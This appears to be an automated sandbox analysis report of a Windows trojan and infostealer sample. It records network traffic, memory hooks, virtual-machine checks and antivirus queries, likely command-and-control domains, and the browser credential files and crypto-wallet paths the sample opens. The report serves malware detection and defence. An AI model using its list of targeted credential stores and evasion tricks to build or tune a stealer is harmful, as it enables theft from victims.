              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.146:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: invalid certificate
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136783445.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144682234.000000000158B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeVirustotal: Detection: 40%
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeReversingLabs: Detection: 29%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic file information: File size 8162448 > 1048576
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x7a7c00
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: section name: .vmp
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: section name: .vmp
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeStatic PE information: section name: .vmp

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 590005 value: E9 2B BA DB 76 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 7734BA30 value: E9 DA 45 24 89 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 5A0008 value: E9 8B 8E DF 76 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 77398E90 value: E9 80 71 20 89 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 14A0005 value: E9 8B 4D 49 75 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 76934D90 value: E9 7A B2 B6 8A Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 2F60005 value: E9 EB EB 9E 73 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 7694EBF0 value: E9 1A 14 61 8C Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 2F70005 value: E9 8B 8A 9B 72 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 75928A90 value: E9 7A 75 64 8D Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 2F80005 value: E9 2B 02 9D 72 Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeMemory written: PID: 5156 base: 75950230 value: E9 DA FD 62 8D Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe TID: 2216Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe TID: 1936Thread sleep time: -30000s >= -30000sJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211498704.00000000014CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129194928.000000000150D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210048551.0000000001509000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211604345.000000000150C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210246032.000000000150B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2144627085.0000000003B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: boredimperissvieos.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: holicisticscrarws.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: sweetsquarediaslw.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: plaintediousidowsko.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: miniaturefinerninewjs.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: zippyfinickysofwps.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: obsceneclassyjuwks.shop
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2210633114.0000000000680000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: acceptabledcooeprs.shop
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210158596.0000000003AFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003AFC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2190370494.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212116605.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211550716.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210195171.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210048551.00000000014F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ez": "Jaxx Liberty"
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ez": "ExodusWeb3"
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210048551.00000000014EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136234548.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
